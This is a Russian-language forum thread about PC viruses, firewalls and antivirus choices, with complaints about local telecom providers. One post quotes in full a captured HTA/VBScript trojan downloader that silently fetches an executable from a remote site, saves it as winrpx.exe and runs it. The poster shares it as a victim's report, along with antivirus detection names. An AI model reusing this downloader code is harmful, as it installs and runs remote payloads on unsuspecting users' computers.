Все трояны пишутся в реестр. Убиваешь сначала в процессах, потом в ветке автозапуска. А лучше все-таки поставь того же Каспера и грохай им.
Так не нашел их в реестре. Зато как то выловил у себя такое файло: Код: <HTA:APPLICATION ID="oHTA" APPLICATIONNAME="myApp" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="yes" VERSION="1.0" WINDOWSTATE="minimize"/> <script_language="v_bscript"> self.MoveTo 5000,5000 payload = "http://internetsolution_ru/hmd/hmd_exe" target = "winrpx.exe" const ForWriting = 2 set xmlHTTP = CreateObject("Microsoft.XMLHTTP") xmlHTTP.open "GET", payload, false xmlHTTP.send contents = xmlHTTP.responseBody Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.CreateTextFile(target, ForWriting) for i = 0 to UBound(contents) thischarcode = ascb(midb(contents, i+1, 1)) f.Write chr(thischarcode) next f.close Set shell=CreateObject("WScript.Shell") shell.run(target) </script> После работы которого в каталоге windows появляется файлик winrpx.exe размером ~44 КБ b и начинается закачивание на мой винт неизвестно чего и неизвестно куда. Вроде как с этот сайта: <a href='http://internetsolution.ru/' target='_blank'>http://internetsolution.ru/</a> на который я ранее не заходил. порносайтами не увлекаюсь (может больной? )
Проверился на сайте касперского <a href='http://www.kaspersky.ru/scanforvirus' target='_blank'>http://www.kaspersky.ru/scanforvirus</a> С таким результатом: winrpx.exe - инфицирован TrojanDownloader.Win32.Small.gt internetsolution.txt - инфицирован TrojanDownloader.VBS.Codin
Re: re:Вирусы просто я где-то до позапрошлого года тоже думал, что я белый и пушистый, в сети никому не нужен, подозрительных программ не запускаю и т.д. Вот интересно, никто не проводил такого эксперимента : устанавливаем на новый комп только виндовс (например ХР), заходим в сеть и ничего там не делая сидим там, например, пару суток. Вопрос - сколько на компе окажется вирусов ? ЗЫ Весьма интересно услышать мнение человека под ником Безопасный.
Re: re:Вирусы Пяти минут не пройдёт как минимум один уже прочно обоснуется. А пару суток с Центртелекомом - без штанов останешься. Тем паче сегодня у меня коннект 4800, через 3-4 минуты обрыв. Модем наверно неправильно настроен .
Люди, ставьте Kerio Firewall. Он для домашнего использования халявный. Прост в установке и настройке. Пока особых нареканий не было (кроме того, что он периодически "забывает" каким программам разрешено щемиться в интернет и приходится опять разрешать).
Насчет антивируса - при всей былой ненависти к Касперскому 5 версия выше всяких похвал - и по производительности, и по простоте и машину не напрягает. Насчет файрвола - не люблю но приходится...он мне локалку блин пока не настроишь - не дает..даже не поиграешься а пользуюсь Black icом
Re: re:Вирусы Я раньше мучался с Outpost, а теперь перелез на ZoneAlarm. А вот говорят Касперского ставить, действительно рулит? Просто я как-то попривык к доктор вэбу...
Re: re:Вирусы Tiny Personal Firewall -- простейший пакетный фильтр, работас ним уже пару лет, пока справляется
Re: re:Вирусы Ни в коем случае не ставить ни веба, и Касперского на операционик линейки NT! Только Norton Antivirus -- самый нормальный софт.
Re: re:Вирусы Первый раз слышу (век живи...), обычно бытует мнение: наши вирусы самые крутые и только наши антивирусы ловят всё ( под словом "наши" имел ввиду - "отечественные"). Попробую антивирус от дядьки Нортона, вроде софт его меня никогда не подводил. Особо сейчас радует Norton Ghost, как я его раньше не выцепил, ума не приложу.
Re: re:Вирусы Не знаю, после нескольких неудачных экспериментов с web и Касперским под NT4 Workstation ещё в 99 году стал юзать Norton Antivirus, с тех пор вирусов на винте не держу Главное -- вовремя апдейтиться Минус -- первый апдейт очень большой (порядка 6 мегабайт). Плюсы -- поддерживаются _все_ версии антивируса, даже 5-ая, причём не нужно ставить новые (версии, в смысле), апдейты на сайте (вирусных баз и самого движка) идут в куче под любую версию и не было ещё такого, как ДырВеб, например, сделал -- извините, эти новые антивирусные базы не могут работать под этой версией Dr.Web. Скачайте и установите версию 4.30. У меня NAV 2002 сейчас -- самостоятельно апдейтит через интернет и базы и собственный движок. Хотя версия достаточно старая, я думал, её поддерживать перестанут. Пока поддерживают
Хакер, а NAV купленый или сломаный? Если сломаный, надо и мне базу проапдейтить. Кстати, вот еще софтина, на которую денег очень жалко. Я даже думаю, что антивирусы могли бы быть и бесплатными, хотя бы для home use. Учитывая, что современные вирусы сплошь сетевые, компании сами заинтересованы в том, чтобы у домашних пользователей не было вирусов.
Re: re:Вирусы Условно купленый На диске с материнкой шёл, подписка на апдейт в течение года. Это провайдеры должны быть заинтересованы, а производители антивирусов в бесплатных версиях совсем не заинтересованы
Re: re:Вирусы А с какой радости пров заинтересован? ИМХО им вообще ВСЁ по пейджеру. Как-то телекомовцы плакали что их спам задрал, но я не увидел\не услышал ни одного действия по улучшению защиты платного! ящика.
Не для всех бесплатных, только для home use. А опен-соурсных антивирусов нету, что ли? Казалось бы, самое оно для опен-соурса. Ну, телекомовцы всегда плачут Вообще-то нормальные конторы, которые акционерные, всегда наоборот, кричат на всех углах, как у них все хорошо, как они растут, какие у них прибыли. Это здорово повышает цену на акции. А СвязьИнформ с одной стороны рапортует о внедрениях, подключениях и освоении современных технологий связи (типа мертворожденного ISDN, про которого я от других вообще не слышал), а с другой стороны плачет, как у них все плохо, как нерентабельно, и бедных сельских абонентов их заставляют обслуживать, и автоматы на улицах портят, и городская связь убыточна (только непонятно тогда, зачем ИМ заниматься IP-телефонией? Это же еще больше снижает стоимость звонков по межгороду, на которых они якобы и зарабатывают.) Так какие там ящики платные? На моем яндексном ящике спама валится прилично, но ВЕСЬ он помечен как спам специальным хедером и в поле subject. Будущее, имхо, именно за огромными бесплатными почтовыми серверами. Т.к. они могут предоставлять сервисы, которые маленьким (по числу клиентов) компаниям и не снились. Это к разговору о провайдерах На днях будут ставить телефон (три года ждал, как в народной примете). Оценю во всей красе качество дозвона до СмоленскТелекома
Re: re:Вирусы Ну и фигли что я сельский? расценки дерут как за городской номер. У телекома нашего бак в месяц и выходит только за коммерческое имя (иногда нужно для работы а то похерил бы давно и не мучался с убиванием спама) Не знаю как у вас, у меня третий день мрак: коннект от 4800 до 26400 скачет но держится максимум пару минут. Убился напрочь, сейчас уже просто кипеть начинаю. Хотел проапдейтить хвалёный NAV но куда там, проблема форум забрать с почтой. Дай бог дожить до понедельника, изнасилую связистов во все порты. Прёт фон жуткий, земля на линии, модем как ни строй- одна хрень. Видать одно лекарство - смена места жительства или поход с пулемётом в местный РУС. Я вот не перестаю удивляться, у связистов самая высокая зарплата по городу а работы реальной ноль, не мож конечно они и делают чего-то но результат неважнец. Халявщики одним словом. Была у меня надежда на МТС но не суждено ей осуществиться, те же бюрократы и долдоны в руководстве, хрен поговоришь толком не говоря о решении проблем.
Re: re:Вирусы С непосредственной. Вирусы сетевые сильно увеличивают трафик. Чем больше вирусов у клиентов провайдера, тем больший трафик через провайдера идёт. Тем больше ему расходов. платного! ящика. Ну, телеком -- это отдельная песня
